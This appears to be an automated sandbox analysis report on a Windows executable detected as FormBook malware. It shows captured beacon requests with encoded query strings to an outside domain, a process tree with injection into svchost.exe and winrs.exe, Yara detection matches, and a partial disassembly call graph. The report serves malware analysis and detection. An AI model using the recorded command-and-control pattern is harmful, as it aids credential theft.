                                                                      Data Raw: 78 50 37 78 3d 75 45 47 55 70 6a 72 30 6f 4d 64 69 59 2b 53 45 4b 4e 2b 33 31 42 34 58 37 33 54 45 64 2b 32 79 6c 46 47 74 7a 6e 57 4c 4c 56 48 54 50 53 43 56 6c 70 2f 66 45 5a 57 2f 77 58 72 32 2f 64 2b 76 75 54 38 4a 32 4d 67 68 56 62 2b 78 55 72 31 58 34 54 35 4a 2f 47 4f 38 61 61 4d 54 56 5a 6a 75 6a 54 50 62 6c 4c 4c 49 53 63 55 48 51 67 64 71 46 4b 5a 6f 43 78 53 39 73 70 36 31 38 4c 43 45 61 6e 62 6d 2f 6a 43 5a 78 68 38 33 69 54 32 37 43 52 31 47 61 4c 33 42 73 65 68 79 50 7a 66 49 6c 32 61 6a 48 59 62 71 57 4f 74 34 45 42 49 44 48 32 37 6f 73 72 36 79 42 53 66 76 4f 46 37 44 46 7a 68 2f 56 75 4f 34 6b 57 46 61 57 57 51 30 51 5a 77 46 6b 66 63 4b 35 65 31 7a 4f 36 4e 31 2f 54 6e 66 4b 34 4b 30 76 73 6b 5a 6b 41 2b 76 70 6b 56 35 36 4a 6e 61 2b 74 44 2f 62 36 5a 4f 4f 72 6d 63 62 34 41 50 32 61 46 67 77 67 5a 5a 54 65 39 65 56 70 45 64 53 48 58 55 7a 4a 4a 53 65 34 42 38 30 55 39 68 61 6b 4a 75 45 42 6e 63 79 6f 51 51 74 4f 32 6d 71 4b 68 41 61 76 6c 79 6a 77 37 72 66 53 45 54 55 5a 66 67 62 [TRUNCATED]
                                                                      Data Ascii: xP7x=uEGUpjr0oMdiY+SEKN+31B4X73TEd+2ylFGtznWLLVHTPSCVlp/fEZW/wXr2/d+vuT8J2MghVb+xUr1X4T5J/GO8aaMTVZjujTPblLLIScUHQgdqFKZoCxS9sp618LCEanbm/jCZxh83iT27CR1GaL3BsehyPzfIl2ajHYbqWOt4EBIDH27osr6yBSfvOF7DFzh/VuO4kWFaWWQ0QZwFkfcK5e1zO6N1/TnfK4K0vskZkA+vpkV56Jna+tD/b6ZOOrmcb4AP2aFgwgZZTe9eVpEdSHXUzJJSe4B80U9hakJuEBncyoQQtO2mqKhAavlyjw7rfSETUZfgbrPizfuIAOroIQKP+Z6lwI9vXZ4cCE1eum14xvV5A9jaJG4WMKpM/ZOa9WoFiStDNBL+327gs/fOPhErKQNGLSAzcJDH3ZWH/VRnk0TcmknhnItmuQ4A9bsxV/QLWH6MJgU1NZ3gZCQjOf9hXM/L/g8BLGhR9Bi1sAGi1xXFKtuvkCzP0TcQd6n8CAUXmCU7B/GF/1OiyGx+vKyg6qZrQofS2zP6cAsLF/0foxN/9PWXfRHuHybmJPcG0c5oP0Notm34lvnS0rHT4QVzYERICOuGggGQB8D39uo/W6fQw8la/SdCZiQzS6VPsqbFedkGE42yNNa6dwtwilALVrZ2plssxKUN0zcpHf9lgot7XmVRzQMoR3mIjGETHxdWAhYiTQl19Gb0rZ3vKTgbyxu7hRF062Ady7qUsC0wcjfUBWcyK8P5feU/oFsykibio5awFBzZls5J/MYHpASAuWn6GJ11MQknG+0mIyOFlGyJZw8i0e3fjSf6CGfL+rRP4dON75P1KtGpjBDtjyQJoW40G4ko0FBYUbQ0yuhPmwFdVEkESA+6lCqUFsC5nMi4FemGaocuEk/rdkzBIOd9yr+K0a4MMILNR37bkbIXoE78ZIZyAy+z9BxSP9tsIsV3xmypvRFS6DrQpBxfgSIFPvmt5bUgdhDVKuLPJfZ [TRUNCATED]
                                                                      Jan 8, 2025 16:15:28.949136972 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 08 Jan 2025 15:15:28 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1154
                                                                      x-request-id: 6a3686f8-1cc6-48a4-a5b6-943fb68e0dda
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==
                                                                      set-cookie: parking_session=6a3686f8-1cc6-48a4-a5b6-943fb68e0dda; expires=Wed, 08 Jan 2025 15:30:28 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 57 63 5a 65 77 70 38 65 49 53 5a 42 72 30 6c 55 59 62 31 36 36 64 72 33 6e 50 41 75 4b 46 6d 38 6c 6b 79 4d 53 79 7a 30 56 7a 74 64 44 33 73 74 32 35 6d 66 72 72 6f 74 42 4f 51 70 45 79 59 51 75 4f 43 4f 47 72 52 56 65 42 4b 63 6c 6f 31 54 6c 68 7a 48 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bWcZewp8eISZBr0lUYb166dr3nPAuKFm8lkyMSyz0VztdD3st25mfrrotBOQpEyYQuOCOGrRVeBKclo1TlhzHg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 8, 2025 16:15:28.949157953 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmEzNjg2ZjgtMWNjNi00OGE0LWE1YjYtOTQzZmI2OGUwZGRhIiwicGFnZV90aW1lIjoxNzM2MzQ5Mz


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      44192.168.2.450046199.59.243.228803752C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 8, 2025 16:15:31.308042049 CET498OUTGET /pn0u/?xP7x=jGu0qTD/ksVhc8OTP4HC7zBU+1XTPuzc0Uy7xFC8PHDlZ2G4sa+fF6flpU/b3trkgDVJnaEHcK2UYYJju1sH3kzyJpZIX8bfuxajpqPIVOEtPxAfDoAlEB0=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.dating-apps-az-dn5.xyz
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:15:31.561660051 CET1236INHTTP/1.1 200 OK
                                                                      date: Wed, 08 Jan 2025 15:15:30 GMT
                                                                      content-type: text/html; charset=utf-8
                                                                      content-length: 1466
                                                                      x-request-id: 287be79f-10ca-4dc8-8200-3ed8fe5a03d1
                                                                      cache-control: no-store, max-age=0
                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                      vary: sec-ch-prefers-color-scheme
                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kYdAj+CcZTuK4tZVoIElq42MDCsVwLuVdf2e2Z9MbM9aCKpO/pqJhlmNGkFN5AB3dW6GDGoXC64tB+e4A0/+8g==
                                                                      set-cookie: parking_session=287be79f-10ca-4dc8-8200-3ed8fe5a03d1; expires=Wed, 08 Jan 2025 15:30:31 GMT; path=/
                                                                      connection: close
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 59 64 41 6a 2b 43 63 5a 54 75 4b 34 74 5a 56 6f 49 45 6c 71 34 32 4d 44 43 73 56 77 4c 75 56 64 66 32 65 32 5a 39 4d 62 4d 39 61 43 4b 70 4f 2f 70 71 4a 68 6c 6d 4e 47 6b 46 4e 35 41 42 33 64 57 36 47 44 47 6f 58 43 36 34 74 42 2b 65 34 41 30 2f 2b 38 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kYdAj+CcZTuK4tZVoIElq42MDCsVwLuVdf2e2Z9MbM9aCKpO/pqJhlmNGkFN5AB3dW6GDGoXC64tB+e4A0/+8g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                      Jan 8, 2025 16:15:31.561676979 CET919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjg3YmU3OWYtMTBjYS00ZGM4LTgyMDAtM2VkOGZlNWEwM2QxIiwicGFnZV90aW1lIjoxNzM2MzQ5Mz


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:10:12:24
                                                                      Start date:08/01/2025
                                                                      Path:C:\Users\user\Desktop\KSts9xW7qy.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\KSts9xW7qy.exe"
                                                                      Imagebase:0xe70000
                                                                      File size:1'207'296 bytes
                                                                      MD5 hash:0CFF79B58DC5C20EFFD62A99E489556C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:10:12:25
                                                                      Start date:08/01/2025
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\KSts9xW7qy.exe"
                                                                      Imagebase:0xb0000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:10:12:27
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe"
                                                                      Imagebase:0x600000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:3
                                                                      Start time:10:12:30
                                                                      Start date:08/01/2025
                                                                      Path:C:\Windows\SysWOW64\winrs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                      Imagebase:0x3f0000
                                                                      File size:43'008 bytes
                                                                      MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:5
                                                                      Start time:10:12:42
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe"
                                                                      Imagebase:0x600000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:8
                                                                      Start time:10:12:54
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6bf500000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.9%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:9.7%
                                                                        Total number of Nodes:1994
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 92561 e8221a 92562 e8271e 92561->92562 92563 e82223 92561->92563 92571 e81eba Mailbox 92562->92571 92601 eaa58f 48 API calls ___crtGetEnvironmentStringsW 92562->92601 92563->92562 92572 e7936c 92563->92572 92565 e8224e 92565->92562 92566 e8225e 92565->92566 92592 e7b384 92566->92592 92569 eebe8a 92602 e76eed 92569->92602 92573 e79384 92572->92573 92590 e79380 92572->92590 92574 ee4cbd __i64tow 92573->92574 92575 ee4bbf 92573->92575 92576 e79398 92573->92576 92585 e793b0 __itow Mailbox _wcscpy 92573->92585 92577 ee4ca5 92575->92577 92580 ee4bc8 92575->92580 92606 e9172b 80 API calls 3 library calls 92576->92606 92622 e9172b 80 API calls 3 library calls 92577->92622 92583 ee4be7 92580->92583 92580->92585 92582 e793ba 92582->92590 92616 e7ce19 92582->92616 92584 e8f4ea 48 API calls 92583->92584 92587 ee4c04 92584->92587 92607 e8f4ea 92585->92607 92588 e8f4ea 48 API calls 92587->92588 92589 ee4c2a 92588->92589 92589->92590 92591 e7ce19 48 API calls 92589->92591 92590->92565 92591->92590 92593 e7b392 92592->92593 92600 e7b3c5 ___crtGetEnvironmentStringsW 92592->92600 92594 e7b3fd 92593->92594 92595 e7b3b8 92593->92595 92593->92600 92596 e8f4ea 48 API calls 92594->92596 92656 e7bb85 92595->92656 92598 e7b407 92596->92598 92599 e8f4ea 48 API calls 92598->92599 92599->92600 92600->92571 92601->92569 92603 e76f00 92602->92603 92604 e76ef8 92602->92604 92603->92571 92661 e7dd47 48 API calls ___crtGetEnvironmentStringsW 92604->92661 92606->92585 92610 e8f4f2 __calloc_impl 92607->92610 92609 e8f50c 92609->92582 92610->92609 92611 e8f50e std::exception::exception 92610->92611 92623 e9395c 92610->92623 92637 e96805 RaiseException 92611->92637 92613 e8f538 92638 e9673b 47 API calls _free 92613->92638 92615 e8f54a 92615->92582 92617 e7ce28 __NMSG_WRITE 92616->92617 92645 e8ee75 92617->92645 92619 e7ce50 ___crtGetEnvironmentStringsW 92620 e8f4ea 48 API calls 92619->92620 92621 e7ce66 92620->92621 92621->92590 92622->92585 92624 e939d7 __calloc_impl 92623->92624 92634 e93968 __calloc_impl 92623->92634 92644 e97c0e 47 API calls __getptd_noexit 92624->92644 92625 e93973 92625->92634 92639 e981c2 47 API calls __NMSG_WRITE 92625->92639 92640 e9821f 47 API calls 5 library calls 92625->92640 92641 e91145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92625->92641 92628 e9399b RtlAllocateHeap 92628->92634 92636 e939cf 92628->92636 92630 e939c3 92642 e97c0e 47 API calls __getptd_noexit 92630->92642 92633 e939c1 92643 e97c0e 47 API calls __getptd_noexit 92633->92643 92634->92625 92634->92628 92634->92630 92634->92633 92636->92610 92637->92613 92638->92615 92639->92625 92640->92625 92642->92633 92643->92636 92644->92636 92647 e8f4ea __calloc_impl 92645->92647 92646 e9395c _W_store_winword 47 API calls 92646->92647 92647->92646 92648 e8f50c 92647->92648 92649 e8f50e std::exception::exception 92647->92649 92648->92619 92654 e96805 RaiseException 92649->92654 92651 e8f538 92655 e9673b 47 API calls _free 92651->92655 92653 e8f54a 92653->92619 92654->92651 92655->92653 92657 e7bb9b 92656->92657 92660 e7bb96 ___crtGetEnvironmentStringsW 92656->92660 92658 ee1b77 92657->92658 92659 e8ee75 48 API calls 92657->92659 92659->92660 92660->92600 92661->92603 92662 ee9bec 92699 e80ae0 Mailbox ___crtGetEnvironmentStringsW 92662->92699 92663 e7ffe1 Mailbox 92665 e8f4ea 48 API calls 92665->92699 92669 e80509 92763 ebcc5c 86 API calls 4 library calls 92669->92763 92670 e8146e 92677 e76eed 48 API calls 92670->92677 92672 e81473 92762 ebcc5c 86 API calls 4 library calls 92672->92762 92674 e8f4ea 48 API calls 92693 e7fec8 92674->92693 92675 e76eed 48 API calls 92675->92693 92676 eea922 92677->92663 92679 eea246 92682 e76eed 48 API calls 92679->92682 92682->92663 92683 eea873 92684 e7d7f7 48 API calls 92684->92693 92685 eea30e 92685->92663 92758 ea97ed InterlockedDecrement 92685->92758 92686 e7ce19 48 API calls 92686->92699 92688 e90f0a 52 API calls __cinit 92688->92693 92689 ea97ed InterlockedDecrement 92689->92693 92690 eea973 92764 ebcc5c 86 API calls 4 library calls 92690->92764 92692 eea982 92693->92663 92693->92669 92693->92670 92693->92672 92693->92674 92693->92675 92693->92679 92693->92684 92693->92685 92693->92688 92693->92689 92693->92690 92694 e815b5 92693->92694 92704 e81d10 92693->92704 92724 e81820 335 API calls 2 library calls 92693->92724 92761 ebcc5c 86 API calls 4 library calls 92694->92761 92697 eea706 92759 ebcc5c 86 API calls 4 library calls 92697->92759 92699->92663 92699->92665 92699->92686 92699->92693 92699->92697 92700 e81526 Mailbox 92699->92700 92701 ea97ed InterlockedDecrement 92699->92701 92718 ed0d09 92699->92718 92721 ed0d1d 92699->92721 92725 e7fe30 92699->92725 92754 ecef61 82 API calls 2 library calls 92699->92754 92755 ecf0ac 90 API calls Mailbox 92699->92755 92756 eba6ef 48 API calls 92699->92756 92757 ece822 335 API calls Mailbox 92699->92757 92760 ebcc5c 86 API calls 4 library calls 92700->92760 92701->92699 92705 e81d2a 92704->92705 92706 e81ed6 92704->92706 92705->92706 92707 e82357 92705->92707 92709 e81e0b 92705->92709 92717 e81eba 92705->92717 92706->92707 92710 e81f55 92706->92710 92713 e81e9a Mailbox 92706->92713 92706->92717 92707->92717 92768 eb9f44 58 API calls wcstoxq 92707->92768 92709->92710 92712 e81e47 92709->92712 92709->92717 92710->92713 92710->92717 92766 ea97ed InterlockedDecrement 92710->92766 92712->92713 92714 eebfc4 92712->92714 92712->92717 92713->92717 92767 e9203b 58 API calls __wtof_l 92713->92767 92765 e9203b 58 API calls __wtof_l 92714->92765 92717->92693 92769 ecf8ae 92718->92769 92720 ed0d19 92720->92699 92722 ecf8ae 129 API calls 92721->92722 92723 ed0d2d 92722->92723 92723->92699 92724->92693 92726 e7fe50 92725->92726 92737 e7fe7e 92725->92737 92727 e8f4ea 48 API calls 92726->92727 92727->92737 92728 e8146e 92729 e76eed 48 API calls 92728->92729 92733 e7ffe1 92729->92733 92730 ea97ed InterlockedDecrement 92730->92737 92731 e8f4ea 48 API calls 92731->92737 92732 e815b5 92903 ebcc5c 86 API calls 4 library calls 92732->92903 92733->92699 92735 e80509 92905 ebcc5c 86 API calls 4 library calls 92735->92905 92736 e81d10 59 API calls 92736->92737 92737->92728 92737->92730 92737->92731 92737->92732 92737->92733 92737->92735 92737->92736 92739 e90f0a 52 API calls __cinit 92737->92739 92741 eea246 92737->92741 92742 e81473 92737->92742 92745 e76eed 48 API calls 92737->92745 92748 e7d7f7 48 API calls 92737->92748 92749 eea30e 92737->92749 92751 eea973 92737->92751 92901 e81820 335 API calls 2 library calls 92737->92901 92739->92737 92740 eea922 92740->92699 92746 e76eed 48 API calls 92741->92746 92904 ebcc5c 86 API calls 4 library calls 92742->92904 92745->92737 92746->92733 92747 eea873 92747->92699 92748->92737 92749->92733 92902 ea97ed InterlockedDecrement 92749->92902 92906 ebcc5c 86 API calls 4 library calls 92751->92906 92753 eea982 92754->92699 92755->92699 92756->92699 92757->92699 92758->92663 92759->92700 92760->92663 92761->92663 92762->92683 92763->92676 92764->92692 92765->92717 92766->92713 92767->92717 92768->92717 92770 e7936c 81 API calls 92769->92770 92771 ecf8ea 92770->92771 92793 ecf92c Mailbox 92771->92793 92805 ed0567 92771->92805 92773 ecfb8b 92774 ecfcfa 92773->92774 92778 ecfb95 92773->92778 92868 ed0688 89 API calls Mailbox 92774->92868 92777 ecfd07 92777->92778 92779 ecfd13 92777->92779 92818 ecf70a 92778->92818 92779->92793 92780 e7936c 81 API calls 92790 ecf984 Mailbox 92780->92790 92785 ecfbc9 92832 e8ed18 92785->92832 92788 ecfbfd 92839 e8c050 92788->92839 92789 ecfbe3 92838 ebcc5c 86 API calls 4 library calls 92789->92838 92790->92773 92790->92780 92790->92793 92836 ed29e8 48 API calls ___crtGetEnvironmentStringsW 92790->92836 92837 ecfda5 60 API calls 2 library calls 92790->92837 92793->92720 92794 ecfbee GetCurrentProcess TerminateProcess 92794->92788 92795 ecfc14 92804 ecfc3e 92795->92804 92850 e81b90 92795->92850 92797 ecfd65 92797->92793 92801 ecfd7e FreeLibrary 92797->92801 92798 ecfc2d 92866 ed040f 105 API calls _free 92798->92866 92799 e81b90 48 API calls 92799->92804 92801->92793 92804->92797 92804->92799 92867 e7dcae 50 API calls Mailbox 92804->92867 92869 ed040f 105 API calls _free 92804->92869 92870 e7bdfa 92805->92870 92807 ed0582 CharLowerBuffW 92876 eb1f11 92807->92876 92814 ed05d2 92889 e7b18b 92814->92889 92816 ed061a Mailbox 92816->92790 92817 ed05de Mailbox 92817->92816 92893 ecfda5 60 API calls 2 library calls 92817->92893 92819 ecf725 92818->92819 92823 ecf77a 92818->92823 92820 e8f4ea 48 API calls 92819->92820 92821 ecf747 92820->92821 92822 e8f4ea 48 API calls 92821->92822 92821->92823 92822->92821 92824 ed0828 92823->92824 92825 ed0a53 Mailbox 92824->92825 92831 ed084b _strcat _wcscpy __NMSG_WRITE 92824->92831 92825->92785 92826 e7cf93 58 API calls 92826->92831 92827 e7d286 48 API calls 92827->92831 92828 e7936c 81 API calls 92828->92831 92829 e9395c 47 API calls _W_store_winword 92829->92831 92831->92825 92831->92826 92831->92827 92831->92828 92831->92829 92896 eb8035 50 API calls __NMSG_WRITE 92831->92896 92833 e8ed2d 92832->92833 92834 e8edc5 VirtualProtect 92833->92834 92835 e8ed93 92833->92835 92834->92835 92835->92788 92835->92789 92836->92790 92837->92790 92838->92794 92840 e8c064 92839->92840 92842 e8c069 Mailbox 92839->92842 92897 e8c1af 48 API calls 92840->92897 92848 e8c077 92842->92848 92898 e8c15c 48 API calls 92842->92898 92844 e8f4ea 48 API calls 92846 e8c108 92844->92846 92845 e8c152 92845->92795 92847 e8f4ea 48 API calls 92846->92847 92849 e8c113 92847->92849 92848->92844 92848->92845 92849->92795 92849->92849 92851 e81cf6 92850->92851 92854 e81ba2 92850->92854 92851->92798 92852 e81c5d 92852->92798 92853 e81bb9 92853->92852 92859 e8f4ea 48 API calls 92853->92859 92856 e8f4ea 48 API calls 92854->92856 92865 e81bae 92854->92865 92857 ee49c4 92856->92857 92858 e8f4ea 48 API calls 92857->92858 92864 ee49cf 92858->92864 92860 e81c9f 92859->92860 92861 e81cb2 92860->92861 92899 e72925 48 API calls 92860->92899 92861->92798 92863 e8f4ea 48 API calls 92863->92864 92864->92863 92864->92865 92865->92853 92900 e8c15c 48 API calls 92865->92900 92866->92804 92867->92804 92868->92777 92869->92804 92871 e7be0d 92870->92871 92875 e7be0a ___crtGetEnvironmentStringsW 92870->92875 92872 e8f4ea 48 